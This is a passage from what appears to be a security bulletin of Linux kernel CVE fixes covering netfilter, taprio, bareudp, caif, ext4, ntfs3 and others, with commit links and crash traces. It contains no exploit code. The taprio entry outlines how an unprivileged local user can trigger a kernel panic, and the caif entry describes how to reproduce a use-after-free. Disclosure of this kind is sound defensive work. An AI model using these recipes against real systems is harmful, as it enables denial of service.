2026-05-27 | not yet calculated | CVE-2026-45842 | https://git.kernel.org/stable/c/c6980e8b1a86288167f34966fa5219031999b6f1 https://git.kernel.org/stable/c/de42f86e2cf5028a97e74c25869d1a962b13c301 https://git.kernel.org/stable/c/9e1ff0eead073c4f46d874ad2526b7dda5465faf https://git.kernel.org/stable/c/7b0d9e878ec2b21d99ae8051b3dda59cdb66c152 https://git.kernel.org/stable/c/e76607442d5b73e1ba6768f501ef815bb58c2c0e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: arp_tables: fix IEEE1394 ARP payload parsing Weiming Shi says: "arp_packet_match() unconditionally parses the ARP payload assuming two hardware addresses are present (source and target). However, IPv4-over-IEEE1394 ARP (RFC 2734) omits the target hardware address field, and arp_hdr_len() already accounts for this by returning a shorter length for ARPHRD_IEEE1394 devices. As a result, on IEEE1394 interfaces arp_packet_match() advances past a nonexistent target hardware address and reads the wrong bytes for both the target device address comparison and the target IP address. This causes arptables rules to match against garbage data, leading to incorrect filtering decisions: packets that should be accepted may be dropped and vice versa. The ARP stack in net/ipv4/arp.c (arp_create and arp_process) already handles this correctly by skipping the target hardware address for ARPHRD_IEEE1394. Apply the same pattern to arp_packet_match()." Mangle the original patch to always return 0 (no match) in case user matches on the target hardware address which is never present in IEEE1394. Note that this returns 0 (no match) for either normal and inverse match because matching in the target hardware address in ARPHRD_IEEE1394 has never been supported by arptables. This is intentional, matching on the target hardware address should never evaluate true for ARPHRD_IEEE1394. Moreover, adjust arpt_mangle to drop the packet too as AI suggests: In arpt_mangle, the logic assumes a standard ARP layout. Because IEEE1394 (FireWire) omits the target hardware address, the linear pointer arithmetic miscalculates the offset for the target IP address. This causes mangling operations to write to the wrong location, leading to packet corruption. To ensure safety, this patch drops packets (NF_DROP) when mangling is requested for these fields on IEEE1394 devices, as the current implementation cannot correctly map the FireWire ARP payload. This omits both mangling target hardware and IP address. Even if IP address mangling should be possible in IEEE1394, this would require to adjust arpt_mangle offset calculation, which has never been supported. Based on patch from Weiming Shi <bestswngs@gmail.com>. | 2026-05-27 | not yet calculated | CVE-2026-45844 | https://git.kernel.org/stable/c/ad9973df8e0eeb123d9ec4d18828e05b7d44ff4b https://git.kernel.org/stable/c/03ea11dbefaa55c502735ee551c89ef773fe753b https://git.kernel.org/stable/c/1c55053f8ffdc060006df898fd3664e3d1bfac7b https://git.kernel.org/stable/c/ac698d81fd6619c7504cee913f1cab5285fba1b7 https://git.kernel.org/stable/c/1e8e3f449b1e73b73a843257635b9c50f0cc0f0a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: taprio: fix NULL pointer dereference in class dump When a TAPRIO child qdisc is deleted via RTM_DELQDISC, taprio_graft() is called with new == NULL and stores NULL into q->qdiscs[cl - 1]. Subsequent RTM_GETTCLASS dump operations walk all classes via taprio_walk() and call taprio_dump_class(), which calls taprio_leaf() returning the NULL pointer, then dereferences it to read child->handle, causing a kernel NULL pointer dereference. The bug is reachable with namespace-scoped CAP_NET_ADMIN on any kernel with CONFIG_NET_SCH_TAPRIO enabled. On systems with unprivileged user namespaces enabled, an unprivileged local user can trigger a kernel panic by creating a taprio qdisc inside a new network namespace, grafting an explicit child qdisc, deleting it, and requesting a class dump. The RTM_GETTCLASS dump itself requires no capability. Oops: general protection fault, probably for non-canonical address 0xdffffc0000000007: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f] RIP: 0010:taprio_dump_class (net/sched/sch_taprio.c:2478) Call Trace: <TASK> tc_fill_tclass (net/sched/sch_api.c:1966) qdisc_class_dump (net/sched/sch_api.c:2326) taprio_walk (net/sched/sch_taprio.c:2514) tc_dump_tclass_qdisc (net/sched/sch_api.c:2352) tc_dump_tclass_root (net/sched/sch_api.c:2370) tc_dump_tclass (net/sched/sch_api.c:2431) rtnl_dumpit (net/core/rtnetlink.c:6864) netlink_dump (net/netlink/af_netlink.c:2325) rtnetlink_rcv_msg (net/core/rtnetlink.c:6959) netlink_rcv_skb (net/netlink/af_netlink.c:2550) </TASK> Fix this by substituting &noop_qdisc when new is NULL in taprio_graft(), a common pattern used by other qdiscs (e.g., multiq_graft()) to ensure the q->qdiscs[] slots are never NULL. This makes control-plane dump paths safe without requiring individual NULL checks. Since the data-plane paths (taprio_enqueue and taprio_dequeue_from_txq) previously had explicit NULL guards that would drop/skip the packet cleanly, update those checks to test for &noop_qdisc instead. Without this, packets would reach taprio_enqueue_one() which increments the root qdisc's qlen and backlog before calling the child's enqueue; noop_qdisc drops the packet but those counters are never rolled back, permanently inflating the root qdisc's statistics. After this change *old can be a valid qdisc, NULL, or &noop_qdisc. Only call qdisc_put(*old) in the first case to avoid decreasing noop_qdisc's refcount, which was never increased. | 2026-05-27 | not yet calculated | CVE-2026-45845 | https://git.kernel.org/stable/c/ec2501e361b08b50bcb1e7b3253fc861abbda28d https://git.kernel.org/stable/c/d02e2fbf60de46678e2ea698a6a904fd21e1cc31 https://git.kernel.org/stable/c/48b26d48e76221dc90b02bf5428bab53643461ca https://git.kernel.org/stable/c/8f1ff8866cb9f655e5faea6994eb902960be8e04 https://git.kernel.org/stable/c/3d07ca5c0fae311226f737963984bd94bb159a87 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bareudp: fix NULL pointer dereference in bareudp_fill_metadata_dst() bareudp_fill_metadata_dst() passes bareudp->sock to udp_tunnel6_dst_lookup() in the IPv6 path without a NULL check. The socket is only created in bareudp_open() and NULLed in bareudp_stop(), so calling this function while the device is down triggers a NULL dereference via sock->sk. BUG: kernel NULL pointer dereference, address: 0000000000000018 RIP: 0010:udp_tunnel6_dst_lookup (net/ipv6/ip6_udp_tunnel.c:160) Call Trace: <TASK> bareudp_fill_metadata_dst (drivers/net/bareudp.c:532) do_execute_actions (net/openvswitch/actions.c:901) ovs_execute_actions (net/openvswitch/actions.c:1589) ovs_packet_cmd_execute (net/openvswitch/datapath.c:700) genl_family_rcv_msg_doit (net/netlink/genetlink.c:1114) genl_rcv_msg (net/netlink/genetlink.c:1209) netlink_rcv_skb (net/netlink/af_netlink.c:2550) </TASK> Add a NULL check returning -ESHUTDOWN, consistent with the xmit paths in the same driver. | 2026-05-27 | not yet calculated | CVE-2026-45846 | https://git.kernel.org/stable/c/a0f4e4e8e0f5e24ddd83e3d1221732621cf34636 https://git.kernel.org/stable/c/35a115a204be08f97450b0389413e218268ef4a2 https://git.kernel.org/stable/c/74a02921c48fcd35a7881956c9e5c52b86595f5d https://git.kernel.org/stable/c/638905520fc4fae6a80991563f264131545ba3df https://git.kernel.org/stable/c/aa6c6d9ee064aabfede4402fd1283424e649ca19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: remove WARN_ON_ONCE when accessing forward path array Although unlikely, recent support for IPIP tunnels increases chances of reaching this WARN_ON_ONCE if userspace manages to build a sufficiently long forward path. Remove it. | 2026-05-27 | not yet calculated | CVE-2026-45847 | https://git.kernel.org/stable/c/548244c2f542aa0ad49453e9306e715a3877bc44 https://git.kernel.org/stable/c/dcf9b3c90e5560339649d088836529883fb509f3 https://git.kernel.org/stable/c/9464ca7a6e56ad1ebf48b2ad5c16871edfad10c6 https://git.kernel.org/stable/c/959ea349c7e2d4edf07b6838ca7e59345fe61a08 https://git.kernel.org/stable/c/50422613185d505201167e8bdd2f2700790d5db6 https://git.kernel.org/stable/c/a78d055ba7c31103ad02f8eceb0c452e154d2660 https://git.kernel.org/stable/c/008e7a7c293b30bc43e4368dac6ea3808b75a572 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: fix NULL sock in aa_sock_file_perm Deal with the potential that sock and sock-sk can be NULL during socket setup or teardown. This could lead to an oops. The fix for NULL pointer dereference in __unix_needs_revalidation shows this is at least possible for af_unix sockets. While the fix for af_unix sockets applies for newer mediation this is still the fall back path for older af_unix mediation and other sockets, so ensure it is covered. | 2026-05-27 | not yet calculated | CVE-2026-45848 | https://git.kernel.org/stable/c/68538ec34fcb4194c7961dc4eca6f5537fec8067 https://git.kernel.org/stable/c/5121b7283f1c46e4c06b88b1dda7b064429d77de https://git.kernel.org/stable/c/c11b7c3280d000376e27ebfed17ec7046699eab4 https://git.kernel.org/stable/c/0dc19bca22606f7a61d5988408f74e3ae0ef3486 https://git.kernel.org/stable/c/3852eb9a0392eb435c03dcb47d581bcfe6a9a95b https://git.kernel.org/stable/c/ccb66a3c6c8f51b3ed1bc003b70bb9ff99e8d835 https://git.kernel.org/stable/c/8a0ededbfcff74598f82f1d4b8ef9db28878b317 https://git.kernel.org/stable/c/00b67657535dfea56e84d11492f5c0f61d0af297 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mscc: ocelot: add missing lock protection in ocelot_port_xmit_inj() ocelot_port_xmit_inj() calls ocelot_can_inject() and ocelot_port_inject_frame() without holding the injection group lock. Both functions contain lockdep_assert_held() for the injection lock, and the correct caller felix_port_deferred_xmit() properly acquires the lock using ocelot_lock_inj_grp() before calling these functions. Add ocelot_lock_inj_grp()/ocelot_unlock_inj_grp() around the register injection path to fix the missing lock protection. The FDMA path is not affected as it uses its own locking mechanism. | 2026-05-27 | not yet calculated | CVE-2026-45849 | https://git.kernel.org/stable/c/0b217a40156f497e09dd20d3f7baec40c785f386 https://git.kernel.org/stable/c/cc1b179f778f98270bdbbb48d183b4b6427ae198 https://git.kernel.org/stable/c/7ac58d8832802ec89baa7539e13e6d58a88cce04 https://git.kernel.org/stable/c/51c32ae7fae14552d79f7139614b77c1bbd57a48 https://git.kernel.org/stable/c/63da961381e0d979459dede713001f8452364477 https://git.kernel.org/stable/c/026f6513c5880c2c89e38ad66bbec2868f978605 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipvs: skip ipv6 extension headers for csum checks Protocol checksum validation fails for IPv6 if there are extension headers before the protocol header. iph->len already contains its offset, so use it to fix the problem. | 2026-05-27 | not yet calculated | CVE-2026-45850 | https://git.kernel.org/stable/c/a3ca27762ce8476b4fbf9b2a8f5cb74c38e483e4 https://git.kernel.org/stable/c/05cfe9863ef049d98141dc2969eefde72fb07625 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: efi: Fix reservation of unaccepted memory table The reserve_unaccepted() function incorrectly calculates the size of the memblock reservation for the unaccepted memory table. It aligns the size of the table, but fails to account for cases where the table's starting physical address (efi.unaccepted) is not page-aligned. If the table starts at an offset within a page and its end crosses into a subsequent page that the aligned size does not cover, the end of the table will not be reserved. This can lead to the table being overwritten or inaccessible, causing a kernel panic in accept_memory(). This issue was observed when starting Intel TDX VMs with specific memory sizes (e.g., > 64GB). Fix this by calculating the end address first (including the unaligned start) and then aligning it up, ensuring the entire range is covered by the reservation. | 2026-05-27 | not yet calculated | CVE-2026-45851 | https://git.kernel.org/stable/c/b7bc182ec1846be437351e44164089d988f9d0dd https://git.kernel.org/stable/c/ba6b6f1502fa55621d1db23f253d54322bdbe4e0 https://git.kernel.org/stable/c/9b18bf59977f5c5bc3b11b210520f62500a7adf3 https://git.kernel.org/stable/c/e649b5916725c68f44ebf45fb396df563c5dbaf2 https://git.kernel.org/stable/c/0862438c90487e79822d5647f854977d50381505 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Use kvfree instead of kfree in amdgpu_gmc_get_nps_memranges() amdgpu_discovery_get_nps_info() internally allocates memory for ranges using kvcalloc(), which may use vmalloc() for large allocation. Using kfree() to release vmalloc memory will lead to a memory corruption. Use kvfree() to safely handle both kmalloc and vmalloc allocations. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45853 | https://git.kernel.org/stable/c/16e7e7ad8cdc6b4c4af7f31e262f1494c1b2a55e https://git.kernel.org/stable/c/9ae85b0c1909b6c6bfd2636b04cdaf7f520bf2b5 https://git.kernel.org/stable/c/f441538893eba6347b983f2904819ca6c99da65e https://git.kernel.org/stable/c/0c44d61945c4a80775292d96460aa2f22e62f86c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: inside-secure/eip93 - unregister only available algorithm EIP93 has an options register. This register indicates which crypto algorithms are implemented in silicon. Supported algorithms are registered on this basis. Unregister algorithms on the same basis. Currently, all algorithms are unregistered, even those not supported by HW. This results in panic on platforms that don't have all options implemented in silicon. | 2026-05-27 | not yet calculated | CVE-2026-45854 | https://git.kernel.org/stable/c/243d642ff5809811208fa1707b7ab8a6ab4b1d68 https://git.kernel.org/stable/c/4c1c5a1d720fdacea060e106c7dd79417243d121 https://git.kernel.org/stable/c/0ceeadc7b53a041d89d5843f6bf0ccb7c98b0b4f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ata: libata-scsi: avoid Non-NCQ command starvation When a non-NCQ command is issued while NCQ commands are being executed, ata_scsi_qc_issue() indicates to the SCSI layer that the command issuing should be deferred by returning SCSI_MLQUEUE_XXX_BUSY. This command deferring is correct and as mandated by the ACS specifications since NCQ and non-NCQ commands cannot be mixed. However, in the case of a host adapter using multiple submission queues, when the target device is under a constant load of NCQ commands, there are no guarantees that requeueing the non-NCQ command will be executed later and it may be deferred again repeatedly as other submission queues can constantly issue NCQ commands from different CPUs ahead of the non-NCQ command. This can lead to very long delays for the execution of non-NCQ commands, and even complete starvation for these commands in the worst case scenario. Since the block layer and the SCSI layer do not distinguish between queueable (NCQ) and non queueable (non-NCQ) commands, libata-scsi SAT implementation must ensure forward progress for non-NCQ commands in the presence of NCQ command traffic. This is similar to what SAS HBAs with a hardware/firmware based SAT implementation do. Implement such forward progress guarantee by limiting requeueing of non-NCQ commands from ata_scsi_qc_issue(): when a non-NCQ command is received and NCQ commands are in-flight, do not force a requeue of the non-NCQ command by returning SCSI_MLQUEUE_XXX_BUSY and instead return 0 to indicate that the command was accepted but hold on to the qc using the new deferred_qc field of struct ata_port. This deferred qc will be issued using the work item deferred_qc_work running the function ata_scsi_deferred_qc_work() once all in-flight commands complete, which is checked with the port qc_defer() callback return value indicating that no further delay is necessary. This check is done using the helper function ata_scsi_schedule_deferred_qc() which is called from ata_scsi_qc_complete(). This thus excludes this mechanism from all internal non-NCQ commands issued by ATA EH. When a port deferred_qc is non NULL, that is, the port has a command waiting for the device queue to drain, the issuing of all incoming commands (both NCQ and non-NCQ) is deferred using the regular busy mechanism. This simplifies the code and also avoids potential denial of service problems if a user issues too many non-NCQ commands. Finally, whenever ata EH is scheduled, regardless of the reason, a deferred qc is always requeued so that it can be retried once EH completes. This is done by calling the function ata_scsi_requeue_deferred_qc() from ata_eh_set_pending(). This avoids the need for any special processing for the deferred qc in case of NCQ error, link or device reset, or device timeout. | 2026-05-27 | not yet calculated | CVE-2026-45855 | https://git.kernel.org/stable/c/ce22aaed011206fed9cbd8c9c2d44718607f31ee https://git.kernel.org/stable/c/888cd7e40adb2ef4af1b4d3b6e2e83ad409ae8c2 https://git.kernel.org/stable/c/5d61a38a60e62750526d94663b69b7ac5c7f07a5 https://git.kernel.org/stable/c/0ea84089dbf62a92dc7889c79e6b18fc89260808 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: csiostor: Fix dereference of null pointer rn The error exit path when rn is NULL ends up deferencing the null pointer rn via the use of the macro CSIO_INC_STATS. Fix this by adding a new error return path label after the use of the macro to avoid the deference. | 2026-05-27 | not yet calculated | CVE-2026-45857 | https://git.kernel.org/stable/c/16ccbfddcb32365138c806cf572e69b42a193c5c https://git.kernel.org/stable/c/44ef9f81392de885883f73b9f5c43936a82ae9d7 https://git.kernel.org/stable/c/526ea3c0ccd495b0079db3e28fdddd51c1bf01f7 https://git.kernel.org/stable/c/25d623f0d77c11a256a54e860d00c239aa9a2583 https://git.kernel.org/stable/c/6037124dbf675fbd0a6248aaf04cf07387b8c323 https://git.kernel.org/stable/c/25ab5e97d3c5f3ed594b4a65d1cc99dc24756681 https://git.kernel.org/stable/c/3bbbab7b6949c76df64210348adbefedaabbf549 https://git.kernel.org/stable/c/1982257570b84dc33753d536dd969fd357a014e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: don't zero the entire extent if EXT4_EXT_DATA_PARTIAL_VALID1 When allocating initialized blocks from a large unwritten extent, or when splitting an unwritten extent during end I/O and converting it to initialized, there is currently a potential issue of stale data if the extent needs to be split in the middle. 0 A B N [UUUUUUUUUUUU] U: unwritten extent [--DDDDDDDD--] D: valid data |<- ->| ----> this range needs to be initialized ext4_split_extent() first try to split this extent at B with EXT4_EXT_DATA_ENTIRE_VALID1 and EXT4_EXT_MAY_ZEROOUT flag set, but ext4_split_extent_at() failed to split this extent due to temporary lack of space. It zeroout B to N and mark the entire extent from 0 to N as written. 0 A B N [WWWWWWWWWWWW] W: written extent [SSDDDDDDDDZZ] Z: zeroed, S: stale data ext4_split_extent() then try to split this extent at A with EXT4_EXT_DATA_VALID2 flag set. This time, it split successfully and left a stale written extent from 0 to A. 0 A B N [WW|WWWWWWWWWW] [SS|DDDDDDDDZZ] Fix this by pass EXT4_EXT_DATA_PARTIAL_VALID1 to ext4_split_extent_at() when splitting at B, don't convert the entire extent to written and left it as unwritten after zeroing out B to N. The remaining work is just like the standard two-part split. ext4_split_extent() will pass the EXT4_EXT_DATA_VALID2 flag when it calls ext4_split_extent_at() for the second time, allowing it to properly handle the split. If the split is successful, it will keep extent from 0 to A as unwritten. | 2026-05-27 | not yet calculated | CVE-2026-45858 | https://git.kernel.org/stable/c/58ddae5d77b1db3a27b891c75a8fa120239ac092 https://git.kernel.org/stable/c/d17857b4fb9ba5745b59be0ef38fd532991fccbf https://git.kernel.org/stable/c/d67c8ecf3d8fda9b8ef80e6f665d84b6d6ac9d88 https://git.kernel.org/stable/c/7015fcf473796e1d2d876f241bd9e0c36f3d4eef https://git.kernel.org/stable/c/1bf6974822d1dba86cf11b5f05498581cf3488a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i3c: dw: Fix memory leak in dw_i3c_master_i2c_xfers() The dw_i3c_master_i2c_xfers() function allocates memory for the xfer structure using dw_i3c_master_alloc_xfer(). If pm_runtime_resume_and_get() fails, the function returns without freeing the allocated xfer, resulting in a memory leak. Add a dw_i3c_master_free_xfer() call to the error path to ensure the allocated memory is properly freed. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45863 | https://git.kernel.org/stable/c/140a45bd4f6db7d1b30cab967d29689b946c52fa https://git.kernel.org/stable/c/8e71414e252c1cb235911008a98fd47927d3a55c https://git.kernel.org/stable/c/a2c41467ef42f69a3958493a0395ba75174710dc https://git.kernel.org/stable/c/2537089413514caaa9a5fdeeac3a34d45100f747 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: prevent infinite loops caused by the next valid being the same When processing valid within the range [valid : pos), if valid cannot be retrieved correctly, for example, if the retrieved valid value is always the same, this can trigger a potential infinite loop, similar to the hung problem reported by syzbot [1]. Adding a check for the valid value within the loop body, and terminating the loop and returning -EINVAL if the value is the same as the current value, can prevent this. [1] INFO: task syz.4.21:6056 blocked for more than 143 seconds. Call Trace: rwbase_write_lock+0x14f/0x750 kernel/locking/rwbase_rt.c:244 inode_lock include/linux/fs.h:1027 [inline] ntfs_file_write_iter+0xe6/0x870 fs/ntfs3/file.c:1284 | 2026-05-27 | not yet calculated | CVE-2026-45864 | https://git.kernel.org/stable/c/50c822fcb36768f1fb356f05b02a2248ef81936d https://git.kernel.org/stable/c/6d93239b4fc479f7c0a412dd196ec0ca2672d14a https://git.kernel.org/stable/c/71c8b966ec56e13c02388c1312910588bb49be7a https://git.kernel.org/stable/c/b97e371e5d1c13d722335d46eb8bc1a22b272a0e https://git.kernel.org/stable/c/4bf3bafb8e0635ed93e3cd4156dcbcc0fb960cb4 https://git.kernel.org/stable/c/a47a2bb9aa6455d5cee1045814a60c749309c92b https://git.kernel.org/stable/c/27b75ca4e51e3e4554dc85dbf1a0246c66106fd3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mctp i2c: initialise event handler read bytes Set a 0xff value for i2c reads of an mctp-i2c device. Otherwise reads will return "val" from the i2c bus driver. For i2c-aspeed and i2c-npcm7xx that is a stack uninitialised u8. Tested with "i2ctransfer -y 1 r10@0x34" where 0x34 is a mctp-i2c instance, now it returns all 0xff. | 2026-05-27 | not yet calculated | CVE-2026-45865 | https://git.kernel.org/stable/c/93e01e837e105299f1c259ef71f6e1ec4fe806e3 https://git.kernel.org/stable/c/11f83253244060b5de5eac787f61ae3f3e559d01 https://git.kernel.org/stable/c/fa9861e5c8af7651dddfa8d490aaada17ae33b6c https://git.kernel.org/stable/c/6ff2ebfef75fbc57d937d8fbe738b967edf2d331 https://git.kernel.org/stable/c/1eeedb310229bfee9dd4d992e5bba33fe1378a8f https://git.kernel.org/stable/c/2a14e91b6d76639dac70ea170f4384c1ee3cb48d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: caif: fix use-after-free in caif_serial ldisc_close() There is a use-after-free bug in caif_serial where handle_tx() may access ser->tty after the tty has been freed. The race condition occurs between ldisc_close() and packet transmission: CPU 0 (close) CPU 1 (xmit) ------------- ------------ ldisc_close() tty_kref_put(ser->tty) [tty may be freed here] <-- race window --> caif_xmit() handle_tx() tty = ser->tty // dangling ptr tty->ops->write() // UAF! schedule_work() ser_release() unregister_netdevice() The root cause is that tty_kref_put() is called in ldisc_close() while the network device is still active and can receive packets. Since ser and tty have a 1:1 binding relationship with consistent lifecycles (ser is allocated in ldisc_open and freed in ser_release via unregister_netdevice, and each ser binds exactly one tty), we can safely defer the tty reference release to ser_release() where the network device is unregistered. Fix this by moving tty_kref_put() from ldisc_close() to ser_release(), after unregister_netdevice(). This ensures the tty reference is held as long as the network device exists, preventing the UAF. Note: We save ser->tty before unregister_netdevice() because ser is embedded in netdev's private data and will be freed along with netdev (needs_free_netdev = true). How to reproduce: Add mdelay(500) at the beginning of ldisc_close() to widen the race window, then run the reproducer program [1]. Note: There is a separate deadloop issue in handle_tx() when using PORT_UNKNOWN serial ports (e.g., /dev/ttyS3 in QEMU without proper serial backend). This deadloop exists even without this patch, and is likely caused by inconsistency between uart_write_room() and uart_write() in serial core. It has been addressed in a separate patch [2]. KASAN report: ================================================================== BUG: KASAN: slab-use-after-free in handle_tx+0x5d1/0x620 Read of size 1 at addr ffff8881131e1490 by task caif_uaf_trigge/9929 Call Trace: <TASK> dump_stack_lvl+0x10e/0x1f0 print_report+0xd0/0x630 kasan_report+0xe4/0x120 handle_tx+0x5d1/0x620 dev_hard_start_xmit+0x9d/0x6c0 __dev_queue_xmit+0x6e2/0x4410 packet_xmit+0x243/0x360 packet_sendmsg+0x26cf/0x5500 __sys_sendto+0x4a3/0x520 __x64_sys_sendto+0xe0/0x1c0 do_syscall_64+0xc9/0xf80 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f615df2c0d7 Allocated by task 9930: Freed by task 64: Last potentially related work creation: The buggy address belongs to the object at ffff8881131e1000 which belongs to the cache kmalloc-cg-2k of size 2048 The buggy address is located 1168 bytes inside of freed 2048-byte region [ffff8881131e1000, ffff8881131e1800) The buggy address belongs to the physical page: page_owner tracks the page as allocated page last free pid 9778 tgid 9778 stack trace: Memory state around the buggy address: ffff8881131e1380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff8881131e1400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb >ffff8881131e1480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ ffff8881131e1500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff8881131e1580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ================================================================== [1]: https://gist.github.com/mrpre/f683f244544f7b11e7fa87df9e6c2eeb [2]: https://lore.kernel.org/linux-serial/20260204074327.226165-1-jiayuan.chen@linux.dev/T/#u | 2026-05-27 | not yet calculated | CVE-2026-45866 | https://git.kernel.org/stable/c/5e266ba8d330d3b8e5bc198f238cd8901826cfa1 https://git.kernel.org/stable/c/d3c75db4e0460641dbcd274b40867e252d801da1 https://git.kernel.org/stable/c/4e63d6f68544ae5269ac9735ae5b69b59b5b8725 https://git.kernel.org/stable/c/331e2b7051635780edea248dd08ae2026c126f4a https://git.kernel.org/stable/c/52731ef4438155cea782fac74e547a327ab9e7c5 https://git.kernel.org/stable/c/c8c197aaa56b25a2d54f3aa07e27e228d6c08546 https://git.kernel.org/stable/c/40962f2bf8cdba63af23aec95ad3f49b689e58e2 https://git.kernel.org/stable/c/308e7e4d0a846359685f40aade023aee7b27284c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: act8945a: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45867 | https://git.kernel.org/stable/c/f2a0777b1e5a3cee1712c4d3e9095c0df8fc8cb3 https://git.kernel.org/stable/c/0768e8525a46df103647ca5059b32320d7fd17e4 https://git.kernel.org/stable/c/d023ef9f748b2090f7a9dbdd5c622b6ad99088ea https://git.kernel.org/stable/c/697bb5dc0cb4791e244f3970b067bc1ef33be9d9 https://git.kernel.org/stable/c/76a42ba547a9b2e2337894f67a4d9247445007d5 https://git.kernel.org/stable/c/f27eb76def5c07e4d7cc468b40741f19dafc83ce https://git.kernel.org/stable/c/83c1bd466c514cb24ca6ef347c5aac76a13c4e1e https://git.kernel.org/stable/c/3291c51d4684d048dd2eb91b5b65fcfdaf72141f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: single: fix refcount leak in pcs_add_gpio_func() of_parse_phandle_with_args() returns a device_node pointer with refcount incremented in gpiospec.np. The loop iterates through all phandles but never releases the reference, causing a refcount leak on each iteration. Add of_node_put() calls to release the reference after extracting the needed arguments and on the error path when devm_kzalloc() fails. This bug was detected by our static analysis tool and verified by my code review. | 2026-05-27 | not yet calculated | CVE-2026-45868 | https://git.kernel.org/stable/c/191bfd5710d6a7f48ba4315d8d3e908dcc15243c https://git.kernel.org/stable/c/3e3b28bb0b6ddc521a4fdd1c1ba0d35017a0796b https://git.kernel.org/stable/c/456a60d06c09a92680dc35fabca68024badcc28e https://git.kernel.org/stable/c/99cc7352156c65201c675f750e0e77c4c73d93f5 https://git.kernel.org/stable/c/7814b1431848854b56717086e2b61bea3c59753d https://git.kernel.org/stable/c/e2e367e56bacb93ce5ac73f0b3297d5c83d38dd4 https://git.kernel.org/stable/c/5b9e84d27e310f22c4ba45fedbc4f5baf43dd823 https://git.kernel.org/stable/c/353353309b0f7afa407df29e455f9d15b5acc296 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: wm97xx: Fix NULL pointer dereference in power_supply_changed() In `probe()`, `request_irq()` is called before allocating/registering a `power_supply` handle. If an interrupt is fired between the call to `request_irq()` and `power_supply_register()`, the `power_supply` handle will be used uninitialized in `power_supply_changed()` in `wm97xx_bat_update()` (triggered from the interrupt handler). This will lead to a `NULL` pointer dereference since Fix this racy `NULL` pointer dereference by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. Since the IRQ is the last thing requests in the `probe()` now, remove the error path for freeing it. Instead add one for unregistering the `power_supply` handle when IRQ request fails. | 2026-05-27 | not yet calculated | CVE-2026-45869 | https://git.kernel.org/stable/c/3d7b5391bb95505b3581c1fb77150c467ab92864 https://git.kernel.org/stable/c/438f9a303ea8b55162b2d5376490c2ab3ec165a0 https://git.kernel.org/stable/c/9b7d77cb046b4487e8e511e04e62b6f416ce845c https://git.kernel.org/stable/c/86183153c299e8bb1839e717286d6c6f39508a59 https://git.kernel.org/stable/c/93bdf715d33cf5ee01c58e8546c2469c71ce082a https://git.kernel.org/stable/c/c0def811ad8d642dca9b6d31a198cc39f5f90837 https://git.kernel.org/stable/c/dfaf235d5a6b60cbf115a14a656946303ad007b7 https://git.kernel.org/stable/c/39fe0eac6d755ef215026518985fcf8de9360e9e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SUNRPC: auth_gss: fix memory leaks in XDR decoding error paths The gssx_dec_ctx(), gssx_dec_status(), and gssx_dec_name() functions allocate memory via gssx_dec_buffer(), which calls kmemdup(). When a subsequent decode operation fails, these functions return immediately without freeing previously allocated buffers, causing memory leaks. The leak in gssx_dec_ctx() is particularly relevant because the caller (gssp_accept_sec_context_upcall) initializes several buffer length fields to non-zero values, resulting in memory allocation: struct gssx_ctx rctxh = { .exported_context_token.len = GSSX_max_output_handle_sz, .mech.len = GSS_OID_MAX_LEN, .src_name.display_name.len = GSSX_max_princ_sz, .targ_name.display_name.len = GSSX_max_princ_sz }; If, for example, gssx_dec_name() succeeds for src_name but fails for targ_name, the memory allocated for exported_context_token, mech, and src_name.display_name remains unreferenced and cannot be reclaimed. Add error handling with goto-based cleanup to free any previously allocated buffers before returning an error. | 2026-05-27 | not yet calculated | CVE-2026-45870 | https://git.kernel.org/stable/c/c81431b1b9fbd21e9a5a9211b5517b7295d18e6a https://git.kernel.org/stable/c/caf7eff432e91a9eba1c79fa545c2f54be15d62b 